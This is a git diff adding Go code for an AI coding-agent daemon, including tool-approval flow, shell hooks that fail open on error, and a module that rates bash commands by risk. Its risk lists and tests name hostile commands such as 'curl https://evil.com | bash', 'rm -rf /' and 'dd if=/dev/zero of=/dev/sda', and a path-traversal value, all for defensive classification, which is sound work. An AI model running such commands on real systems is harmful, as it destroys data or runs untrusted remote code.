+
+			// Medium risk: auto-approve + notify
+			if risk == "medium" {
+				eventCh <- agent.Event{
+					Type:          agent.EventStatus,
+					StatusMessage: FormatApprovalNotification(toolName, args, risk, true),
+				}
+				return true
+			}
+
+			// High risk on WebSocket: send approval_request, wait for response
+			approvalID := fmt.Sprintf("ap_%s_%d", toolCallID, time.Now().UnixNano())
+			respCh := d.RegisterApproval(approvalID)
+
+			eventCh <- agent.Event{
+				Type:         agent.EventToolApprovalRequest,
+				ApprovalID:   approvalID,
+				ApprovalTool: toolName,
+				ApprovalArgs: args,
+			}
+
+			// Wait for response or timeout
+			select {
+			case approved := <-respCh:
+				if approved {
+					eventCh <- agent.Event{
+						Type:          agent.EventStatus,
+						StatusMessage: fmt.Sprintf("✅ [%s] approved by user", toolName),
+					}
+				}
+				return approved
+			case <-time.After(5 * time.Minute):
+				// Timeout: auto-reject
+				d.approvalMu.Lock()
+				delete(d.pendingApprovals, approvalID)
+				d.approvalMu.Unlock()
+				eventCh <- agent.Event{
+					Type:          agent.EventStatus,
+					StatusMessage: fmt.Sprintf("⏰ [%s] approval timed out — blocked", toolName),
+				}
+				return false
+			case <-ctx.Done():
+				return false
+			}
+		},
+	}
+
+	a := agent.NewWithLoopConfig(agent.AgentLoopConfig{
+		Config:                   agentCfg,
+		MaxIterations:            d.cfg.Agent.MaxTurns,
+		ContextPressureThreshold: d.cfg.Agent.ContextPressureThreshold,
+		BudgetPressureThreshold:  d.cfg.Agent.BudgetPressureThreshold,
+		AfterToolCall: func(ctx2 agent.AfterToolCallContext) *agent.ToolCallResult {
+			if d.hooksMgr.HasPostHook() {
+				argsMap, _ := ctx2.Args.(map[string]any)
+				errMsg := ""
+				if ctx2.IsError {
+					errMsg = ctx2.Result.Content
+				}
+				d.hooksMgr.PostToolCall(ctx, ctx2.ToolCall.Name, argsMap, ctx2.Result.Content, errMsg, sess.Platform, sess.UserID)
+			}
+			return nil
+		},
+	}, sess.Registry)
+	var runErr error
+	if d.agentMgr != nil {
+		d.agentMgr.Register(agent.NewAgentAdapter(a))
+		defer func() {
+			d.agentMgr.Finish(a.ID(), runErr)
+		}()
+	}
+
+	// Apply force compact flag from /compact command
+	if sess.ForceCompact {
+		a.SetForceCompact()
+		sess.ForceCompact = false
+	}
+
+	// Load session history so the agent has conversation context
+	if history := sess.Manager.GetMessages(); len(history) > 0 {
+		a.LoadHistoryMessages(history)
+	}
+
+	agentCh := a.Run(ctx, userInput)
+
+	for ev := range agentCh {
+		if ev.Type == agent.EventError {
+			runErr = ev.Error
+		}
+		eventCh <- ev
+	}
+	return nil
+}
+
+// buildExtraContext loads context files and skills for a working directory.
+func (d *Dispatcher) buildExtraContext(workDir string) string {
+	var extra string
+	if d.settings.ContextFiles.Enabled {
+		cfResult := contextfiles.LoadContextFiles(workDir, config.ConfigDir(), d.settings.ContextFiles.ExtraFiles)
+		if ctx := contextfiles.BuildContextString(cfResult); ctx != "" {
+			extra = ctx
+		}
+	}
+
+	skillsMgr := skills.NewManager(d.settings.GetGlobalSkillsDir(), filepath.Join(workDir, ".skills"))
+	_ = skillsMgr.Load()
+	extra += skillsMgr.BuildAllSkillsContext()
+
+	return extra
+}
+
+// handleCommand processes slash commands from messaging platforms.
+func (d *Dispatcher) handleCommand(msg messaging.InboundMessage) (string, error) {
+	parts := strings.Fields(msg.Text)
+	if len(parts) == 0 {
+		return "", nil
+	}
+
+	cmd := strings.ToLower(parts[0])
+	switch cmd {
+	case "/new":
+		if err := d.RotateSession(msg.Platform, msg.UserID); err != nil {
+			return "❌ Failed to create new session: " + err.Error(), nil
+		}
+		return "✅ New session created.", nil
+	case "/clear":
+		sess, err := d.resolveSession(msg.Platform, msg.UserID)
+		if err != nil {
+			return "❌ No active session.", nil
+		}
+		sess.Lock()
+		defer sess.Unlock()
+		// Archive old session before clearing (same as /new)
+		dir := d.hermesSessionDir(msg.Platform, msg.UserID)
+		activePath := filepath.Join(dir, "active.jsonl")
+		if _, statErr := os.Stat(activePath); statErr == nil {
+			mgr, openErr := session.Open(activePath)
+			if openErr == nil {
+				hdr := mgr.GetHeader()
+				idPrefix := "unknown"
+				if hdr != nil && len(hdr.ID) >= 8 {
+					idPrefix = hdr.ID[:8]
+				}
+				archived := filepath.Join(dir, fmt.Sprintf("%s_%s.jsonl",
+					time.Now().Format("20060102-150405"), idPrefix))
+				os.Rename(activePath, archived)
+			} else {
+				archived := filepath.Join(dir, fmt.Sprintf("%s_corrupt.jsonl",
+					time.Now().Format("20060102-150405")))
+				os.Rename(activePath, archived)
+			}
+		}
+		// Close MCP clients before replacing session
+		key := sessionKey(msg.Platform, msg.UserID)
+		if len(sess.MCPClients) > 0 {
+			mcp.CloseClients(sess.MCPClients)
+		}
+		delete(d.sessions, key)
+		return "✅ Session cleared.", nil
+	case "/status":
+		sess := d.GetSession(sessionKey(msg.Platform, msg.UserID))
+		if sess == nil {
+			return "No active session.", nil
+		}
+		msgs := sess.Manager.GetMessages()
+		return fmt.Sprintf("Session: %s\nMode: %s\nMessages: %d\nWorkDir: %s",
+			sess.ID, sess.Mode, len(msgs), sess.WorkDir), nil
+	case "/sessions":
+		sessions := d.ListSessions()
+		if len(sessions) == 0 {
+			return "No active sessions.", nil
+		}
+		var sb strings.Builder
+		sb.WriteString(fmt.Sprintf("Active sessions (%d):\n", len(sessions)))
+		for _, s := range sessions {
+			msgs := s.Manager.GetMessages()
+			sb.WriteString(fmt.Sprintf("  • %s (%d msgs, %s)\n", s.ID, len(msgs), s.WorkDir))
+		}
+		return sb.String(), nil
+	case "/mode":
+		if len(parts) < 2 {
+			sess := d.GetSession(sessionKey(msg.Platform, msg.UserID))
+			if sess != nil {
+				return fmt.Sprintf("Current mode: %s", sess.Mode), nil
+			}
+			return "No active session.", nil
+		}
+		mode := strings.ToLower(parts[1])
+		switch mode {
+		case "plan", "agent", "yolo":
+			sess, err := d.resolveSession(msg.Platform, msg.UserID)
+			if err != nil {
+				return "❌ No active session.", nil
+			}
+			sess.Mode = mode
+			return fmt.Sprintf("✅ Mode set to %s.", mode), nil
+		default:
+			return "Invalid mode. Use: plan, agent, yolo", nil
+		}
+	case "/compact":
+		sess, err := d.resolveSession(msg.Platform, msg.UserID)
+		if err != nil {
+			return "❌ No active session.", nil
+		}
+		sess.Lock()
+		defer sess.Unlock()
+		if sess.Manager != nil && len(sess.Manager.GetMessages()) < 2 {
+			return "Nothing to compact: conversation is too short.", nil
+		}
+		sess.ForceCompact = true
+		return "✅ Context compaction will be triggered on the next message.", nil
+	default:
+		return fmt.Sprintf("Unknown command: %s\nAvailable: /new /clear /status /sessions /mode /compact", cmd), nil
+	}
+}
+
+// handleCommandForWS processes slash commands from WebSocket clients.
+func (d *Dispatcher) handleCommandForWS(connID, text string) string {
+	msg := messaging.InboundMessage{
+		Platform: "ws",
+		UserID:   connID,
+		Text:     text,
+	}
+	result, _ := d.handleCommand(msg)
+	return result
+}
+
+// hermesSessionDir returns the directory for a platform user's sessions.
+func (d *Dispatcher) hermesSessionDir(platform, userID string) string {
+	return filepath.Join(d.sessionDir, "hermes", safeSessionPathComponent(platform), safeSessionPathComponent(userID))
+}
+
+// sessionKey builds a session pool key.
+func sessionKey(platform, userID string) string {
+	return fmt.Sprintf("hermes/%s/%s", platform, userID)
+}
+
+func safeSessionPathComponent(s string) string {
+	if s == "" || s == "." || s == ".." {
+		return "b64_" + base64.RawURLEncoding.EncodeToString([]byte(s))
+	}
+	for _, r := range s {
+		if r >= 'a' && r <= 'z' || r >= 'A' && r <= 'Z' || r >= '0' && r <= '9' {
+			continue
+		}
+		switch r {
+		case '-', '_', '.', '@':
+			continue
+		default:
+			return "b64_" + base64.RawURLEncoding.EncodeToString([]byte(s))
+		}
+	}
+	return s
+}
+
+// archiveCorrupt renames a corrupt session file.
+func (d *Dispatcher) archiveCorrupt(path string) {
+	dir := filepath.Dir(path)
+	archived := filepath.Join(dir, fmt.Sprintf("%s_corrupt.jsonl",
+		time.Now().Format("20060102-150405")))
+	os.Rename(path, archived)
+}
+
+// RegisterApproval registers a pending approval and returns its channel.
+func (d *Dispatcher) RegisterApproval(approvalID string) chan bool {
+	ch := make(chan bool, 1)
+	d.approvalMu.Lock()
+	d.pendingApprovals[approvalID] = ch
+	d.approvalMu.Unlock()
+	return ch
+}
+
+// ResolveApproval resolves a pending approval with the given decision.
+func (d *Dispatcher) ResolveApproval(approvalID string, approved bool) bool {
+	d.approvalMu.Lock()
+	ch, ok := d.pendingApprovals[approvalID]
+	if ok {
+		delete(d.pendingApprovals, approvalID)
+	}
+	d.approvalMu.Unlock()
+
+	if ok {
+		// Use select to avoid blocking if the channel was already consumed
+		// (e.g., timeout raced with this call).
+		select {
+		case ch <- approved:
+		default:
+		}
+		return true
+	}
+	return false
+}
+
+func truncate(s string, maxLen int) string {
+	return util.TruncateWithSuffix(s, maxLen, "...")
+}
diff --git a/internal/hermes/hooks/hooks.go b/internal/hermes/hooks/hooks.go
new file mode 100644
index 0000000..bd93bce
--- /dev/null
+++ b/internal/hermes/hooks/hooks.go
@@ -0,0 +1,154 @@
+// Package hooks implements shell hook scripts for Hermes mode.
+// Hooks are external scripts called before/after tool execution,
+// communicating via JSON on stdin/stdout.
+package hooks
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"os"
+	"os/exec"
+	"strings"
+	"time"
+)
+
+// Manager manages pre/post tool call hooks.
+type Manager struct {
+	preToolCall  string // path to pre_tool_call script
+	postToolCall string // path to post_tool_call script
+	timeout      time.Duration
+}
+
+// NewManager creates a hooks manager.
+func NewManager(preToolCall, postToolCall string) *Manager {
+	return &Manager{
+		preToolCall:  preToolCall,
+		postToolCall: postToolCall,
+		timeout:      10 * time.Second,
+	}
+}
+
+// HasPreHook returns true if a pre_tool_call hook is configured.
+func (m *Manager) HasPreHook() bool {
+	return m.preToolCall != ""
+}
+
+// HasPostHook returns true if a post_tool_call hook is configured.
+func (m *Manager) HasPostHook() bool {
+	return m.postToolCall != ""
+}
+
+// PreToolCallRequest is sent to the pre_tool_call script via stdin.
+type PreToolCallRequest struct {
+	Hook     string         `json:"hook"`
+	Tool     string         `json:"tool"`
+	Args     map[string]any `json:"args"`
+	Platform string         `json:"platform"`
+	UserID   string         `json:"user_id"`
+}
+
+// PreToolCallResponse is read from the pre_tool_call script via stdout.
+type PreToolCallResponse struct {
+	Action string `json:"action"` // "allow" or "block"
+	Reason string `json:"reason,omitempty"`
+}
+
+// PostToolCallRequest is sent to the post_tool_call script via stdin.
+type PostToolCallRequest struct {
+	Hook     string         `json:"hook"`
+	Tool     string         `json:"tool"`
+	Args     map[string]any `json:"args"`
+	Result   string         `json:"result"`
+	Error    string         `json:"error,omitempty"`
+	Platform string         `json:"platform"`
+	UserID   string         `json:"user_id"`
+}
+
+// PreToolCall runs the pre_tool_call hook.
+// Returns (allow, reason, error).
+// If no hook is configured, returns (true, "", nil).
+func (m *Manager) PreToolCall(ctx context.Context, tool string, args map[string]any, platform, userID string) (bool, string, error) {
+	if m.preToolCall == "" {
+		return true, "", nil
+	}
+
+	req := PreToolCallRequest{
+		Hook:     "pre_tool_call",
+		Tool:     tool,
+		Args:     args,
+		Platform: platform,
+		UserID:   userID,
+	}
+
+	output, err := m.runScript(ctx, m.preToolCall, req)
+	if err != nil {
+		// Hook failure = allow by default (fail open)
+		return true, "", fmt.Errorf("pre_tool_call hook error: %w", err)
+	}
+
+	var resp PreToolCallResponse
+	if err := json.Unmarshal(output, &resp); err != nil {
+		return true, "", fmt.Errorf("pre_tool_call hook: invalid JSON response: %w", err)
+	}
+
+	switch strings.ToLower(resp.Action) {
+	case "block":
+		return false, resp.Reason, nil
+	case "allow", "":
+		return true, "", nil
+	default:
+		return true, "", fmt.Errorf("pre_tool_call hook: unknown action %q", resp.Action)
+	}
+}
+
+// PostToolCall runs the post_tool_call hook (fire-and-forget).
+func (m *Manager) PostToolCall(ctx context.Context, tool string, args map[string]any, result, errMsg, platform, userID string) {
+	if m.postToolCall == "" {
+		return
+	}
+
+	req := PostToolCallRequest{
+		Hook:     "post_tool_call",
+		Tool:     tool,
+		Args:     args,
+		Result:   result,
+		Error:    errMsg,
+		Platform: platform,
+		UserID:   userID,
+	}
+
+	// Fire and forget — don't block the agent loop
+	go func() {
+		m.runScript(ctx, m.postToolCall, req)
+	}()
+}
+
+// runScript executes a hook script with JSON input on stdin, returns stdout.
+func (m *Manager) runScript(ctx context.Context, scriptPath string, input any) ([]byte, error) {
+	ctx, cancel := context.WithTimeout(ctx, m.timeout)
+	defer cancel()
+
+	// Check script exists
+	if _, err := os.Stat(scriptPath); err != nil {
+		return nil, fmt.Errorf("hook script not found: %s", scriptPath)
+	}
+
+	inputJSON, err := json.Marshal(input)
+	if err != nil {
+		return nil, fmt.Errorf("marshal hook input: %w", err)
+	}
+
+	cmd := exec.CommandContext(ctx, scriptPath)
+	cmd.Stdin = strings.NewReader(string(inputJSON))
+
+	output, err := cmd.Output()
+	if err != nil {
+		if exitErr, ok := err.(*exec.ExitError); ok {
+			return nil, fmt.Errorf("hook script exited with code %d: %s", exitErr.ExitCode(), string(exitErr.Stderr))
+		}
+		return nil, err
+	}
+
+	return output, nil
+}
diff --git a/internal/hermes/hooks/hooks_test.go b/internal/hermes/hooks/hooks_test.go
new file mode 100644
index 0000000..38d7b4b
--- /dev/null
+++ b/internal/hermes/hooks/hooks_test.go
@@ -0,0 +1,136 @@
+package hooks
+
+import (
+	"context"
+	"os"
+	"path/filepath"
+	"testing"
+)
+
+func TestNewManager(t *testing.T) {
+	m := NewManager("", "")
+	if m.HasPreHook() {
+		t.Error("expected no pre hook")
+	}
+	if m.HasPostHook() {
+		t.Error("expected no post hook")
+	}
+
+	m2 := NewManager("/path/pre", "/path/post")
+	if !m2.HasPreHook() {
+		t.Error("expected pre hook")
+	}
+	if !m2.HasPostHook() {
+		t.Error("expected post hook")
+	}
+}
+
+func TestPreToolCallNoHook(t *testing.T) {
+	m := NewManager("", "")
+	allowed, reason, err := m.PreToolCall(context.Background(), "bash", map[string]any{"command": "ls"}, "ws", "user1")
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if !allowed {
+		t.Error("expected allowed when no hook")
+	}
+	if reason != "" {
+		t.Errorf("expected empty reason, got %s", reason)
+	}
+}
+
+func TestPreToolCallAllow(t *testing.T) {
+	script := createTestScript(t, `#!/bin/sh
+echo '{"action": "allow"}'
+`)
+	defer os.Remove(script)
+
+	m := NewManager(script, "")
+	allowed, reason, err := m.PreToolCall(context.Background(), "bash", map[string]any{"command": "ls"}, "ws", "user1")
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if !allowed {
+		t.Error("expected allowed")
+	}
+	if reason != "" {
+		t.Errorf("expected empty reason, got %s", reason)
+	}
+}
+
+func TestPreToolCallBlock(t *testing.T) {
+	script := createTestScript(t, `#!/bin/sh
+echo '{"action": "block", "reason": "destructive command"}'
+`)
+	defer os.Remove(script)
+
+	m := NewManager(script, "")
+	allowed, reason, err := m.PreToolCall(context.Background(), "bash", map[string]any{"command": "rm -rf /"}, "ws", "user1")
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if allowed {
+		t.Error("expected blocked")
+	}
+	if reason != "destructive command" {
+		t.Errorf("expected 'destructive command', got %s", reason)
+	}
+}
+
+func TestPreToolCallScriptNotFound(t *testing.T) {
+	m := NewManager("/nonexistent/script", "")
+	allowed, _, err := m.PreToolCall(context.Background(), "bash", map[string]any{}, "ws", "user1")
+	if err == nil {
+		t.Error("expected error for missing script")
+	}
+	// Fail-open: should allow even on error
+	if !allowed {
+		t.Error("expected fail-open (allowed)")
+	}
+}
+
+func TestPreToolCallInvalidJSON(t *testing.T) {
+	script := createTestScript(t, `#!/bin/sh
+echo 'not json'
+`)
+	defer os.Remove(script)
+
+	m := NewManager(script, "")
+	allowed, _, err := m.PreToolCall(context.Background(), "bash", map[string]any{}, "ws", "user1")
+	if err == nil {
+		t.Error("expected error for invalid JSON")
+	}
+	// Fail-open
+	if !allowed {
+		t.Error("expected fail-open (allowed)")
+	}
+}
+
+func TestPostToolCallNoHook(t *testing.T) {
+	m := NewManager("", "")
+	// Should not panic
+	m.PostToolCall(context.Background(), "bash", map[string]any{}, "result", "", "ws", "user1")
+}
+
+func TestPostToolCallWithHook(t *testing.T) {
+	script := createTestScript(t, `#!/bin/sh
+# Read stdin and log it
+cat > /dev/null
+echo "logged"
+`)
+	defer os.Remove(script)
+
+	m := NewManager("", script)
+	// Should not panic
+	m.PostToolCall(context.Background(), "bash", map[string]any{"command": "ls"}, "result", "", "ws", "user1")
+}
+
+func createTestScript(t *testing.T, content string) string {
+	t.Helper()
+	dir := t.TempDir()
+	path := filepath.Join(dir, "hook.sh")
+	if err := os.WriteFile(path, []byte(content), 0700); err != nil {
+		t.Fatalf("create script: %v", err)
+	}
+	return path
+}
diff --git a/internal/hermes/security.go b/internal/hermes/security.go
new file mode 100644
index 0000000..39a82ea
--- /dev/null
+++ b/internal/hermes/security.go
@@ -0,0 +1,207 @@
+package hermes
+
+import (
+	"fmt"
+	"path/filepath"
+	"strings"
+)
+
+// Security provides user whitelist validation and smart approval logic for Hermes mode.
+type Security struct {
+	cfg *HermesConfig
+}
+
+// NewSecurity creates a security manager.
+func NewSecurity(cfg *HermesConfig) *Security {
+	return &Security{cfg: cfg}
+}
+
+// CheckUserAllowed returns nil if the user is allowed on the given platform.
+// Returns an error with reason if blocked.
+func (s *Security) CheckUserAllowed(platform, userID string) error {
+	var allowedUsers []string
+
+	switch platform {
+	case "wechat":
+		allowedUsers = s.cfg.Wechat.AllowedUsers
+	case "feishu":
+		allowedUsers = s.cfg.Feishu.AllowedUsers
+	case "ws":
+		// WebSocket clients are authenticated via token, no per-user whitelist
+		return nil
+	default:
+		return nil
+	}
+
+	// Empty whitelist = allow all (but warn in logs)
+	if len(allowedUsers) == 0 {
+		return nil
+	}
+
+	for _, allowed := range allowedUsers {
+		if allowed == userID {
+			return nil
+		}
+	}
+
+	return fmt.Errorf("user %s not in allowed_users for platform %s", userID, platform)
+}
+
+// CheckWorkDirAllowed returns nil if the working directory is allowed.
+func (s *Security) CheckWorkDirAllowed(workDir string) error {
+	allowed := s.cfg.Security.AllowedWorkDirs
+	if len(allowed) == 0 {
+		// No restriction
+		return nil
+	}
+
+	cleanWorkDir := filepath.Clean(workDir)
+	for _, dir := range allowed {
+		cleanAllowed := filepath.Clean(dir)
+		rel, err := filepath.Rel(cleanAllowed, cleanWorkDir)
+		if err == nil && (rel == "." || (rel != ".." && !strings.HasPrefix(rel, ".."+string(filepath.Separator)))) {
+			return nil
+		}
+	}
+
+	return fmt.Errorf("working directory %s not in allowed_work_dirs", workDir)
+}
+
+// CommandRiskLevel classifies the risk level of a bash command.
+// Returns "low", "medium", or "high".
+func CommandRiskLevel(command string) string {
+	command = strings.TrimSpace(command)
+
+	// High risk: destructive or system-level commands
+	highRiskPrefixes := []string{
+		"rm -rf", "rm -r",
+		"mkfs", "dd ",
+		"chmod 777", "chmod -R",
+		"chown -R",
+		"sudo ", "su ",
+		"shutdown", "reboot", "halt",
+		"kill -9", "killall",
+		"> /dev/", "curl | sh", "curl | bash", "wget | sh",
+		"eval ", "exec ",
+	}
+	for _, prefix := range highRiskPrefixes {
+		if strings.HasPrefix(command, prefix) || strings.Contains(command, " "+prefix) {
+			return "high"
+		}
+	}
+
+	// High risk: pipe to shell
+	if strings.Contains(command, "| sh") || strings.Contains(command, "| bash") {
+		return "high"
+	}
+
+	// Medium risk: file modifications, network, package management
+	mediumRiskPrefixes := []string{
+		"mv ", "cp -r",
+		"git push", "git reset --hard", "git clean",
+		"npm publish", "go install",
+		"apt ", "yum ", "brew ", "pip install",
+		"docker ", "kubectl ",
+		"curl ", "wget ",
+		"ssh ", "scp ",
+	}
+	for _, prefix := range mediumRiskPrefixes {
+		if strings.HasPrefix(command, prefix) {
+			return "medium"
+		}
+	}
+
+	// Low risk: read-only and common dev commands
+	lowRiskPrefixes := []string{
+		"go ", "make ", "npm ", "yarn ", "node ",
+		"python ", "pip ",
+		"git status", "git log", "git diff", "git branch",
+		"ls", "cat ", "head ", "tail ", "wc ",
+		"echo ", "printf ",
+		"grep ", "find ", "which ", "type ",
+		"cd ", "pwd", "env", "printenv",
+	}
+	for _, prefix := range lowRiskPrefixes {
+		if strings.HasPrefix(command, prefix) {
+			return "low"
+		}
+	}
+
+	return "medium" // default: unknown commands are medium risk
+}
+
+// ApprovalDecision represents the result of an approval check.
+type ApprovalDecision struct {
+	Approved  bool
+	Reason    string
+	RiskLevel string
+}
+
+// FormatApprovalNotification formats a notification for medium/high risk tool calls.
+func FormatApprovalNotification(toolName string, args map[string]any, riskLevel string, approved bool) string {
+	var icon, status string
+	if approved {
+		icon = "⚠️"
+		status = "auto-approved"
+	} else {
+		icon = "🚫"
+		status = "blocked"
+	}
+
+	var detail string
+	if toolName == "bash" {
+		if cmd, ok := args["command"]; ok {
+			cmdStr := fmt.Sprintf("%v", cmd)
+			if len(cmdStr) > 80 {
+				cmdStr = cmdStr[:80] + "..."
+			}
+			detail = cmdStr
+		}
+	} else {
+		if path, ok := args["path"]; ok {
+			detail = fmt.Sprintf("%v", path)
+		}
+	}
+
+	if detail != "" {
+		return fmt.Sprintf("%s [%s] %s %s (%s risk)", icon, toolName, detail, status, riskLevel)
+	}
+	return fmt.Sprintf("%s [%s] %s (%s risk)", icon, toolName, status, riskLevel)
+}
+
+// ShouldAutoApprove returns true if the tool call can be auto-approved in Hermes mode.
+// In Hermes mode, bots run unattended so we need stricter auto-approval rules.
+func (s *Security) ShouldAutoApprove(toolName string, args map[string]any, mode string) bool {
+	if !s.cfg.Security.SmartApprovals {
+		// Smart approvals disabled — fall back to mode-based behavior
+		return mode == "yolo"
+	}
+
+	switch toolName {
+	case "read", "ls", "grep", "find", "skill_ref", "memory", "plan", "jobs":
+		// Read-only tools: always auto-approve
+		return true
+
+	case "write", "edit":
+		// File modifications: auto-approve in agent/yolo mode
+		return mode == "agent" || mode == "yolo"
+
+	case "bash":
+		command, _ := args["command"].(string)
+		risk := CommandRiskLevel(command)
+		switch mode {
+		case "yolo":
+			return risk != "high" // yolo still blocks high-risk
+		case "agent":
+			return risk == "low" // agent only auto-approves low-risk
+		default:
+			return false
+		}
+
+	case "kill":
+		return mode == "agent" || mode == "yolo"
+
+	default:
+		return mode == "yolo"
+	}
+}
diff --git a/internal/hermes/security_test.go b/internal/hermes/security_test.go
new file mode 100644
index 0000000..30880f7
--- /dev/null
+++ b/internal/hermes/security_test.go
@@ -0,0 +1,173 @@
+package hermes
+
+import (
+	"path/filepath"
+	"strings"
+	"testing"
+)
+
+func TestCheckUserAllowed(t *testing.T) {
+	cfg := &HermesConfig{
+		Wechat: WechatConfig{
+			AllowedUsers: []string{"wxid_alice", "wxid_bob"},
+		},
+		Feishu: FeishuConfig{
+			AllowedUsers: []string{"ou_charlie"},
+		},
+	}
+	sec := NewSecurity(cfg)
+
+	// Allowed user
+	if err := sec.CheckUserAllowed("wechat", "wxid_alice"); err != nil {
+		t.Errorf("alice should be allowed: %v", err)
+	}
+
+	// Blocked user
+	if err := sec.CheckUserAllowed("wechat", "wxid_stranger"); err == nil {
+		t.Error("stranger should be blocked")
+	}
+
+	// Feishu allowed
+	if err := sec.CheckUserAllowed("feishu", "ou_charlie"); err != nil {
+		t.Errorf("charlie should be allowed: %v", err)
+	}
+
+	// Feishu blocked
+	if err := sec.CheckUserAllowed("feishu", "ou_stranger"); err == nil {
+		t.Error("stranger should be blocked on feishu")
+	}
+
+	// WebSocket always allowed (token-based auth)
+	if err := sec.CheckUserAllowed("ws", "anyone"); err != nil {
+		t.Errorf("ws should always be allowed: %v", err)
+	}
+
+	// Empty whitelist = allow all
+	cfg2 := &HermesConfig{}
+	sec2 := NewSecurity(cfg2)
+	if err := sec2.CheckUserAllowed("wechat", "anyone"); err != nil {
+		t.Errorf("empty whitelist should allow all: %v", err)
+	}
+}
+
+func TestCheckWorkDirAllowedUsesPathBoundary(t *testing.T) {
+	cfg := &HermesConfig{
+		Security: SecurityConfig{AllowedWorkDirs: []string{"/home/free/work"}},
+	}
+	sec := NewSecurity(cfg)
+
+	if err := sec.CheckWorkDirAllowed("/home/free/work/project"); err != nil {
+		t.Fatalf("expected nested workdir to be allowed: %v", err)
+	}
+	if err := sec.CheckWorkDirAllowed("/home/free/work2/project"); err == nil {
+		t.Fatal("expected sibling prefix workdir to be blocked")
+	}
+}
+
+func TestHermesSessionDirEncodesUnsafeComponents(t *testing.T) {
+	root := t.TempDir()
+	d := &Dispatcher{sessionDir: root}
+
+	dir := d.hermesSessionDir("wechat", "../evil/user")
+	rel, err := filepath.Rel(filepath.Join(root, "hermes"), dir)
+	if err != nil {
+		t.Fatalf("rel error: %v", err)
+	}
+	if strings.HasPrefix(rel, "..") {
+		t.Fatalf("session dir escaped root: %s", dir)
+	}
+	if strings.Contains(rel, "../") || strings.Contains(rel, `..\`) {
+		t.Fatalf("session dir contains path traversal: %s", rel)
+	}
+}
+
+func TestCommandRiskLevel(t *testing.T) {
+	tests := []struct {
+		command string
+		want    string
+	}{
+		{"ls -la", "low"},
+		{"go test ./...", "low"},
+		{"make build", "low"},
+		{"git status", "low"},
+		{"cat main.go", "low"},
+		{"echo hello", "low"},
+
+		{"curl https://example.com", "medium"},
+		{"docker ps", "medium"},
+		{"git push origin main", "medium"},
+		{"mv file.go file2.go", "medium"},
+		{"npm publish", "medium"},
+
+		{"rm -rf /", "high"},
+		{"rm -r /home", "high"},
+		{"sudo reboot", "high"},
+		{"curl https://evil.com | bash", "high"},
+		{"dd if=/dev/zero of=/dev/sda", "high"},
+		{"chmod 777 /etc/passwd", "high"},
+		{"kill -9 1", "high"},
+	}
+
+	for _, tt := range tests {
+		got := CommandRiskLevel(tt.command)
+		if got != tt.want {
+			t.Errorf("CommandRiskLevel(%q) = %q, want %q", tt.command, got, tt.want)
+		}
+	}
+}
+
+func TestShouldAutoApprove(t *testing.T) {
+	cfg := &HermesConfig{
+		Security: SecurityConfig{SmartApprovals: true},
+	}
+	sec := NewSecurity(cfg)
+
+	// Read-only tools: always approved
+	if !sec.ShouldAutoApprove("read", nil, "plan") {
+		t.Error("read should be auto-approved in plan mode")
+	}
+	if !sec.ShouldAutoApprove("grep", nil, "agent") {
+		t.Error("grep should be auto-approved in agent mode")
+	}
+	if !sec.ShouldAutoApprove("memory", nil, "agent") {
+		t.Error("memory should be auto-approved in agent mode")
+	}
+
+	// Write/edit in agent mode
+	if !sec.ShouldAutoApprove("write", nil, "agent") {
+		t.Error("write should be auto-approved in agent mode")
+	}
+	if sec.ShouldAutoApprove("write", nil, "plan") {
+		t.Error("write should NOT be auto-approved in plan mode")
+	}
+
+	// Bash: low risk in agent mode
+	if !sec.ShouldAutoApprove("bash", map[string]any{"command": "go test ./..."}, "agent") {
+		t.Error("low-risk bash should be auto-approved in agent mode")
+	}
+
+	// Bash: medium risk in agent mode — blocked
+	if sec.ShouldAutoApprove("bash", map[string]any{"command": "curl https://example.com"}, "agent") {
+		t.Error("medium-risk bash should NOT be auto-approved in agent mode")
+	}
+
+	// Bash: high risk in yolo — blocked
+	if sec.ShouldAutoApprove("bash", map[string]any{"command": "rm -rf /"}, "yolo") {
+		t.Error("high-risk bash should NOT be auto-approved even in yolo")
+	}
+
+	// Bash: medium risk in yolo — allowed
+	if !sec.ShouldAutoApprove("bash", map[string]any{"command": "docker ps"}, "yolo") {
+		t.Error("medium-risk bash should be auto-approved in yolo")
+	}
+
+	// Smart approvals disabled
+	cfg2 := &HermesConfig{Security: SecurityConfig{SmartApprovals: false}}
+	sec2 := NewSecurity(cfg2)
+	if sec2.ShouldAutoApprove("bash", map[string]any{"command": "ls"}, "agent") {
+		t.Error("with smart_approvals=false, agent mode should not auto-approve")
+	}
+	if !sec2.ShouldAutoApprove("bash", map[string]any{"command": "ls"}, "yolo") {
+		t.Error("with smart_approvals=false, yolo mode should auto-approve")
+	}
+}
diff --git a/internal/hermes/server.go b/internal/hermes/server.go
new file mode 100644
index 0000000..65ba848
--- /dev/null
+++ b/internal/hermes/server.go
@@ -0,0 +1,569 @@
+package hermes
+
+import (
+	"context"
+	"fmt"
+	"log"
+	"net/http"
+	"os"
+	"os/signal"
+	"path/filepath"
+	"syscall"
+	"time"
+
+	"github.com/startvibecoding/vibecoding/internal/a2a"
+	"github.com/startvibecoding/vibecoding/internal/agent"
+	"github.com/startvibecoding/vibecoding/internal/config"
+	"github.com/startvibecoding/vibecoding/internal/cron"
+	"github.com/startvibecoding/vibecoding/internal/hermes/webhook"
+	"github.com/startvibecoding/vibecoding/internal/hermes/ws"
+	"github.com/startvibecoding/vibecoding/internal/memory"
+	"github.com/startvibecoding/vibecoding/internal/messaging"
+	"github.com/startvibecoding/vibecoding/internal/messaging/feishu"
+	"github.com/startvibecoding/vibecoding/internal/messaging/wechat"
+	"github.com/startvibecoding/vibecoding/internal/sandbox"
+	"github.com/startvibecoding/vibecoding/internal/tools"
+)
+
+// RunOptions holds CLI flags for the hermes start command.
+type RunOptions struct {
+	ConfigPath string
+	Port       int
+	WorkDir    string
+	Provider   string
+	Model      string
+	MultiAgent bool
+	Sandbox    bool
+	Daemon     bool
+	Verbose    bool
+	Debug      bool
+}
+
+// Server is the Hermes daemon.
+type Server struct {
+	cfg        *HermesConfig
+	settings   *config.Settings
+	version    string
+	gateway    *ws.Gateway
+	dispatcher *Dispatcher
+	platforms  []messaging.Platform
+	scheduler  *cron.Scheduler
+}
+
+// PIDFilePath returns the path to the hermes PID file.
+func PIDFilePath() string {
+	return filepath.Join(config.ConfigDir(), "hermes.pid")
+}
+
+// writePIDFile writes the current process PID to the PID file.
+func writePIDFile() error {
